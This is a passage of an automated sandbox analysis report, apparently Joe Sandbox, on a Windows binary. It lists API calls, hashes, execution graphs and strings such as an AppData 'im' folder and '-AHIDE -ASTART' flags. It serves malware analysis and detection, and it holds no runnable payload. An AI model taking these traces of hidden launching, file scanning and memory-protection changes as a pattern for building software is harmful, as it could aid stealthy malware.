                                                                                                                                  • getsockopt.WS2_32(00004020,0000FFFF,00001001,00000000,00000004), ref: 6B8D343B
                                                                                                                                  • setsockopt.WS2_32(00004020,0000FFFF,00001001,00004020,00000004), ref: 6B8D3460
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: getsockoptsetsockopt
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 194641219-2726393805
                                                                                                                                  • Opcode ID: 9c2a1cfb3fa5761dc039398441e776cf5565babb61d5fbfaed65b39ad78d4e91
                                                                                                                                  • Instruction ID: fe9f02b321e7f071f8dada72e0f7464d5344d67058df2ed38663fc3539c06529
                                                                                                                                  • Opcode Fuzzy Hash: 9c2a1cfb3fa5761dc039398441e776cf5565babb61d5fbfaed65b39ad78d4e91
                                                                                                                                  • Instruction Fuzzy Hash: 5F01B57194820DBBEF21DF94DC46BAD7779EB11704F1041E1FA04AB2C1D7B9CA449B40
                                                                                                                                  Function 6B8ED8C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • curl_strnequal.LIBCURL(Digest,6B8EB74C,00000006,00000DD0,?,?,6B8EB74C), ref: 6B8ED8E6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2996515029.000000006B8D1000.00000020.00000001.01000000.00000017.sdmp, Offset: 6B8D0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2996472368.000000006B8D0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997000852.000000006B93B000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997178701.000000006B951000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_6b8d0000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: curl_strnequal
                                                                                                                                  • String ID: Digest$t!
                                                                                                                                  • API String ID: 482932555-3305821177
                                                                                                                                  • Opcode ID: 6ecea6a13a530f72ea3c264dbe24b779f5c559db2d3342d90433c01d189164ae
                                                                                                                                  • Instruction ID: 56553660f77eb529cc8253e80c5949e9a1fa180d6cf8721ce846d3958447b5ff
                                                                                                                                  • Opcode Fuzzy Hash: 6ecea6a13a530f72ea3c264dbe24b779f5c559db2d3342d90433c01d189164ae
                                                                                                                                  • Instruction Fuzzy Hash: 58F0F657E4425822DB005969BC01BAA77DD4FD3258F0904B2EC9CD7242EA29E51AC7B0

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:18.8%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                  Signature Coverage:4.3%
                                                                                                                                  Total number of Nodes:138
                                                                                                                                  Total number of Limit Nodes:8
                                                                                                                                  execution_graph 769 70656a7 770 706580b 769->770 771 7065810 3 API calls 769->771 771->770 772 7065125 773 7065136 772->773 774 706514c 773->774 776 7065157 773->776 777 706516b SHFileOperation 776->777 777->774 685 7065c0e 686 7065c25 685->686 687 7065d1c 685->687 701 7065c39 lstrcmp 686->701 689 7065c33 lstrcmp 690 7065c44 689->690 700 70651ae SetErrorMode 690->700 692 7065c5f 698 7065021 9 API calls 692->698 699 7065059 4 API calls 692->699 693 7065caa lstrlen 695 7065cf3 693->695 696 7065d0d wsprintfA 695->696 697 7065d08 696->697 698->693 699->693 700->692 702 7065c44 701->702 712 70651ae SetErrorMode 702->712 704 7065c5f 710 7065021 9 API calls 704->710 711 7065059 4 API calls 704->711 705 7065caa lstrlen 707 7065cf3 705->707 708 7065d0d wsprintfA 707->708 709 7065d08 708->709 710->705 711->705 712->704 713 7065dcc lstrcmpW 714 7065dd7 713->714 715 7065b0d 716 7065b1c 715->716 717 7065b3a 715->717 716->717 718 7065b20 lstrcpy PathRemoveBackslashA 716->718 651 7065f2b wsprintfA 652 7065f49 RegOpenKeyExA 651->652 778 7065f68 779 7065f79 StrRStrIA 778->779 780 7065f8b 778->780 779->780 781 7065ea9 wsprintfA 782 7065ec7 781->782 631 7065bd6 wsprintfA 632 7065be5 CreateMutexA 631->632 633 7065bf6 632->633 719 7065ad6 720 7065ae1 StrCmpNIA 719->720 721 7065af7 719->721 720->721 783 7065e34 lstrcmp 784 7065e41 783->784 722 7065115 wsprintfA 634 7065810 635 7065818 634->635 637 7065829 635->637 638 706582b 635->638 639 7065937 638->639 642 7065846 638->642 639->635 640 706586b VirtualAlloc 640->639 641 7065898 640->641 641->639 643 70658e6 VirtualProtect VirtualProtect 641->643 642->639 642->640 643->639 723 7065b50 724 7065b62 lstrcpy PathRemoveBackslashA 723->724 725 7065b5b 723->725 644 706595e 645 70659b8 CreateFileA 644->645 646 7065969 644->646 646->645 647 7065972 StrRStrIA 646->647 647->645 648 7065986 StrRStrIA 647->648 649 70659ae 648->649 650 706599a StrRStrIA 648->650 650->645 650->649 726 7065b9e StrRStrIA 727 7065be5 CreateMutexA 726->727 728 7065bab lstrlen 726->728 729 7065bf6 727->729 731 7065bbb 728->731 731->727 731->728 732 7065bc8 731->732 736 7065c1b 731->736 749 7065bc9 731->749 733 7065bd1 732->733 754 7065bd6 wsprintfA 732->754 733->727 734 7065d1c 736->734 737 7065c39 13 API calls 736->737 738 7065c33 lstrcmp 737->738 739 7065c44 738->739 757 70651ae SetErrorMode 739->757 741 7065c5f 747 7065021 9 API calls 741->747 748 7065059 4 API calls 741->748 742 7065caa lstrlen 744 7065cf3 742->744 745 7065d0d wsprintfA 744->745 746 7065d08 745->746 747->742 748->742 750 7065bd1 CreateMutexA 749->750 751 7065bd6 2 API calls 749->751 753 7065bf6 750->753 751->750 753->731 755 7065be5 CreateMutexA 754->755 756 7065bf6 755->756 756->733 757->741 758 7065a9f 759 7065ac0 758->759 760 7065aaa StrCmpNIW 758->760 760->759 785 706563a 786 7065641 785->786 787 7065810 3 API calls 786->787 788 706580b 787->788 761 706569b 762 70656a2 761->762 765 7065810 762->765 766 7065818 765->766 767 706582b 3 API calls 766->767 768 706580b 766->768 767->766 653 70659d8 654 7065a32 CreateFileW 653->654 655 70659e3 653->655 655->654 656 70659ec StrRStrIW 655->656 656->654 657 7065a00 StrRStrIW 656->657 658 7065a14 StrRStrIW 657->658 659 7065a28 657->659 658->654 658->659 660 7065c39 lstrcmp 661 7065c44 660->661 671 70651ae SetErrorMode 661->671 663 7065c5f 672 7065059 lstrcmp 663->672 677 7065021 lstrcat FindFirstFileA 663->677 664 7065caa lstrlen 666 7065cf3 664->666 683 7065d0d wsprintfA 666->683 671->663 673 706503f 672->673 674 7065093 FindNextFileA 672->674 673->674 676 706506a lstrcat 673->676 674->673 675 70650a4 FindClose 674->675 675->664 676->673 681 706503f 677->681 678 7065093 FindNextFileA 679 70650a4 FindClose 678->679 678->681 679->664 680 7065059 4 API calls 680->681 681->678 681->680 682 706506a lstrcat 681->682 682->681 684 7065d08 683->684

                                                                                                                                  Callgraph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  • Opacity -> Relevance
                                                                                                                                  • Disassembly available
                                                                                                                                  callgraph 0 Function_07065C0E 3 Function_07065D0D 0->3 17 Function_07065021 0->17 18 Function_070651AE 0->18 28 Function_07065C39 0->28 45 Function_07065059 0->45 1 Function_07087E81 2 Function_07065B0D 4 Function_07065D97 5 Function_07065314 14 Function_070653A7 5->14 32 Function_07065348 5->32 38 Function_070653D0 5->38 52 Function_07065378 5->52 6 Function_07065115 7 Function_07065515 8 Function_07065810 20 Function_0706582B 8->20 9 Function_07065B9E 9->3 9->17 9->18 9->28 33 Function_07065BC9 9->33 35 Function_07065BD6 9->35 9->45 10 Function_07065A9F 11 Function_07065D1F 12 Function_0706569B 12->8 13 Function_07065E18 14->38 15 Function_070656A7 15->8 16 Function_07065125 36 Function_07065157 16->36 17->45 19 Function_07065D2E 21 Function_07065F2B 22 Function_07065228 22->5 22->14 23 Function_070652A8 22->23 22->32 22->38 42 Function_070652DD 22->42 50 Function_07065270 22->50 22->52 23->5 23->14 23->32 23->38 23->42 23->52 24 Function_07065EA9 25 Function_07065E34 26 Function_07087F34 27 Function_0706563A 27->8 28->3 28->17 28->18 28->45 29 Function_07087D41 40 Function_07087E50 29->40 47 Function_07087EE3 29->47 30 Function_07065E4F 31 Function_07065DCC 32->14 32->38 32->52 33->35 34 Function_07065AD6 37 Function_07065A52 39 Function_07065B50 46 Function_07087E68 40->46 40->47 41 Function_0706595E 42->5 42->14 42->32 42->38 42->52 43 Function_07065D5D 44 Function_070659D8 45->45 46->1 48 Function_07065DEB 49 Function_07065F68 50->5 50->14 50->23 50->32 50->38 50->42 50->52 51 Function_07065A7C 52->14 52->38

                                                                                                                                  Executed Functions

                                                                                                                                  Function 07065021 Relevance: 7.6, APIs: 5, Instructions: 51filestringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • lstrcat.KERNEL32(?,0706501D), ref: 07065022
                                                                                                                                  • FindFirstFileA.KERNEL32(?,?,?,0706501D,?,?), ref: 07065036
                                                                                                                                    • Part of subcall function 07065046: lstrcmp.KERNEL32(?,07065044), ref: 07065047
                                                                                                                                    • Part of subcall function 07065046: lstrcat.KERNEL32(?,?), ref: 07065075
                                                                                                                                    • Part of subcall function 07065046: FindNextFileA.KERNELBASE(?,?,?,?,?,0706501D,?,?), ref: 0706509A
                                                                                                                                    • Part of subcall function 07065046: FindClose.KERNEL32(?,?,?,?,0706501D,?,?), ref: 070650B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$Filelstrcat$CloseFirstNextlstrcmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1879274390-0
                                                                                                                                  • Opcode ID: 363fc8d663d25568fa4cb4694c18a05544d6f83d872a8b435be624afdb8b15d4
                                                                                                                                  • Instruction ID: 7f860c635f1bcd321706afb5ccf1234c72218eb1c633077988738b7c946680a9
                                                                                                                                  • Opcode Fuzzy Hash: 363fc8d663d25568fa4cb4694c18a05544d6f83d872a8b435be624afdb8b15d4
                                                                                                                                  • Instruction Fuzzy Hash: 9201C0F2904202AFCB216B74DC5CA8E7FF8EF15346B1206A1F206D2601EA78C9308F61
                                                                                                                                  Function 07065B9E Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 107stringsynchronizationCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,07065B95), ref: 07065BA1
                                                                                                                                  • lstrlen.KERNEL32(?), ref: 07065BAC
                                                                                                                                  • CreateMutexA.KERNEL32(?,?), ref: 07065BEC
                                                                                                                                  • lstrcmp.KERNEL32(?,07065C33), ref: 07065C3A
                                                                                                                                  • lstrlen.KERNEL32(?,?), ref: 07065CE4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$CreateMutexlstrcmp
                                                                                                                                  • String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\im\$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 2704946443-4209170246
                                                                                                                                  • Opcode ID: 76fc11f9acb6136d770fbadf6cf0d918b360d5ef2d081682f92c8f0c3e9f85b7
                                                                                                                                  • Instruction ID: 0a44a9b4900998484c27ef3677e8648ba0f4d2d7421db97b6cf58851316d6b93
                                                                                                                                  • Opcode Fuzzy Hash: 76fc11f9acb6136d770fbadf6cf0d918b360d5ef2d081682f92c8f0c3e9f85b7
                                                                                                                                  • Instruction Fuzzy Hash: 8A31D6F1A54345EFEBA17BB0EC6EBEE3BE4EF00714F154354F250A9081DA7996208B16
                                                                                                                                  Function 0706595E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 39 706595e-7065967 40 70659b8-70659d5 CreateFileA 39->40 41 7065969-7065970 39->41 41->40 42 7065972-7065984 StrRStrIA 41->42 42->40 43 7065986-7065998 StrRStrIA 42->43 44 70659ae-70659b5 43->44 45 706599a-70659ac StrRStrIA 43->45 45->40 45->44
                                                                                                                                  APIs
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,07063CB9), ref: 0706597C
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\im\), ref: 07065990
                                                                                                                                  • StrRStrIA.SHELL32(?,00000000,\log\), ref: 070659A4
                                                                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 070659CD
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID: C:\Users\user\AppData\Roaming\im\$\log\
                                                                                                                                  • API String ID: 823142352-3225649886
                                                                                                                                  • Opcode ID: 94085154d224e47ed37c65792f82cb036719d173932ebc67f1e0cec54474fb52
                                                                                                                                  • Instruction ID: 2d7e078ec77b0f4a07cccd9a75cdbaa3e0405da451f69775d44c895cfc1f38f5
                                                                                                                                  • Opcode Fuzzy Hash: 94085154d224e47ed37c65792f82cb036719d173932ebc67f1e0cec54474fb52
                                                                                                                                  • Instruction Fuzzy Hash: 81011D7124020AFBDF515F55DC5AF9E3FA6AB18B64F008328F915A80A0E77AD470DF60
                                                                                                                                  Function 070659D8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 41fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 46 70659d8-70659e1 47 7065a32-7065a4f CreateFileW 46->47 48 70659e3-70659ea 46->48 48->47 49 70659ec-70659fe StrRStrIW 48->49 49->47 50 7065a00-7065a12 StrRStrIW 49->50 51 7065a14-7065a26 StrRStrIW 50->51 52 7065a28-7065a2f 50->52 51->47 51->52
                                                                                                                                  APIs
                                                                                                                                  • StrRStrIW.SHELL32(?,00000000,07063CC1), ref: 070659F6
                                                                                                                                  • StrRStrIW.SHELL32(?,00000000,C:\Users\user\AppData\Roaming\im\), ref: 07065A0A
                                                                                                                                  • StrRStrIW.SHELL32(?,00000000,.log), ref: 07065A1E
                                                                                                                                  • CreateFileW.KERNEL32(?,?,?,?,?,?,?), ref: 07065A47
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID: .log$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 823142352-2154642801
                                                                                                                                  • Opcode ID: 1847c0ee70e49faa1822cb4b62f59094a230489993bc0995d7766847bcc0a1cd
                                                                                                                                  • Instruction ID: 82b080281bf3f80752e3bd38b7636ae0c7d90fb2dae2760ec0d80cb94e902165
                                                                                                                                  • Opcode Fuzzy Hash: 1847c0ee70e49faa1822cb4b62f59094a230489993bc0995d7766847bcc0a1cd
                                                                                                                                  • Instruction Fuzzy Hash: A701627124020ABBDF515F55DCAAF993FA5AF14768F048218F905980A0D379C470EB40
                                                                                                                                  Function 07065C0E Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 63COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C7A
                                                                                                                                  • -AHIDE -ASTART, xrefs: 07065CF8
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmplstrlen
                                                                                                                                  • String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\im\$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 898299967-4209170246
                                                                                                                                  • Opcode ID: d81341c82154eefb0dac6dc5764dda62ed8f41ab582ad70081796ecbae117f81
                                                                                                                                  • Instruction ID: 260aeda9c924ed39eefdf72c70fc8a478dbd197dd4644a83cb917e8130b9b7ac
                                                                                                                                  • Opcode Fuzzy Hash: d81341c82154eefb0dac6dc5764dda62ed8f41ab582ad70081796ecbae117f81
                                                                                                                                  • Instruction Fuzzy Hash: 531181F1650304FEE7907BB0EC6AFAD77A8AF00714F014350B350A9081DA7966248E2A
                                                                                                                                  Function 07065C39 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 51stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 89 7065c39-7065c42 lstrcmp 90 7065c44-7065c50 89->90 91 7065c55-7065ca0 call 70651ae 89->91 90->91 105 7065ca5 call 7065021 91->105 106 7065ca5 call 7065059 91->106 98 7065caa-7065caf 100 7065cb4-7065d08 lstrlen call 7065d0d 98->100 105->98 106->98
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C7A
                                                                                                                                  • -AHIDE -ASTART, xrefs: 07065CF8
                                                                                                                                  • C:\Users\user\AppData\Roaming\im\, xrefs: 07065C64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmplstrlen
                                                                                                                                  • String ID: -AHIDE -ASTART$C:\Users\user\AppData\Roaming\im\$C:\Users\user\AppData\Roaming\im\
                                                                                                                                  • API String ID: 898299967-4209170246
                                                                                                                                  • Opcode ID: bbb660ed60ad1a92fdd2f46bd3c071bbc055bb84c916026db4faae31b00805e3
                                                                                                                                  • Instruction ID: e911a4c234300c53fb84e0f5b1600c9266249163a71b723454acabbdaa9b67c5
                                                                                                                                  • Opcode Fuzzy Hash: bbb660ed60ad1a92fdd2f46bd3c071bbc055bb84c916026db4faae31b00805e3
                                                                                                                                  • Instruction Fuzzy Hash: 98115EF1690305FEE7913BB0EC6AFA936A5AB00715F024350B341A9081CAB96A655E1A
                                                                                                                                  Function 07065046 Relevance: 6.0, APIs: 4, Instructions: 44filestringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • lstrcmp.KERNEL32(?,07065044), ref: 07065047
                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,?,0706501D,?,?), ref: 0706509A
                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,0706501D,?,?), ref: 070650B6
                                                                                                                                    • Part of subcall function 07065059: lstrcmp.KERNEL32(?,07065056), ref: 0706505A
                                                                                                                                    • Part of subcall function 07065059: lstrcat.KERNEL32(?,?), ref: 07065075
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Findlstrcmp$CloseFileNextlstrcat
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 360925478-0
                                                                                                                                  • Opcode ID: 1674eb121bdf7c6b58bc6d440c8dbe98cf14068808c5481d0bb6d2897b8ccb17
                                                                                                                                  • Instruction ID: f3eb477d38271dce73a79115cbc385a058f0b82e1dcaddd69e351797b3dca55f
                                                                                                                                  • Opcode Fuzzy Hash: 1674eb121bdf7c6b58bc6d440c8dbe98cf14068808c5481d0bb6d2897b8ccb17
                                                                                                                                  • Instruction Fuzzy Hash: 6301DBF2504202AFDB216B349C5CA9E7EE8EF5634AB1106A0F206D1101EA78C9308E61
                                                                                                                                  Function 07065059 Relevance: 6.0, APIs: 4, Instructions: 36stringfileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 107 7065059-7065062 lstrcmp 108 7065064-706508d lstrcat 107->108 109 7065093-70650a2 FindNextFileA 107->109 108->109 110 70650a4-70650bd FindClose 109->110 111 706503f-706504f call 7065046 109->111 111->109 116 7065051-7065062 call 7065059 111->116 116->108 116->109
                                                                                                                                  APIs
                                                                                                                                  • lstrcmp.KERNEL32(?,07065056), ref: 0706505A
                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 07065075
                                                                                                                                  • FindNextFileA.KERNELBASE(?,?,?,?,?,0706501D,?,?), ref: 0706509A
                                                                                                                                  • FindClose.KERNEL32(?,?,?,?,0706501D,?,?), ref: 070650B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000B.00000002.2514314002.0000000007065000.00000040.00000001.01000000.0000000E.sdmp, Offset: 07000000, based on PE: true
                                                                                                                                  • Associated: 0000000B.00000002.2514276987.0000000007000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514360900.0000000007084000.00000080.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514402330.0000000007088000.00000020.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514440851.0000000007089000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514477856.000000000708A000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  • Associated: 0000000B.00000002.2514509989.000000000708B000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_11_2_7000000_ast.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Find$CloseFileNextlstrcatlstrcmp
                                                                                                                                  • String ID:
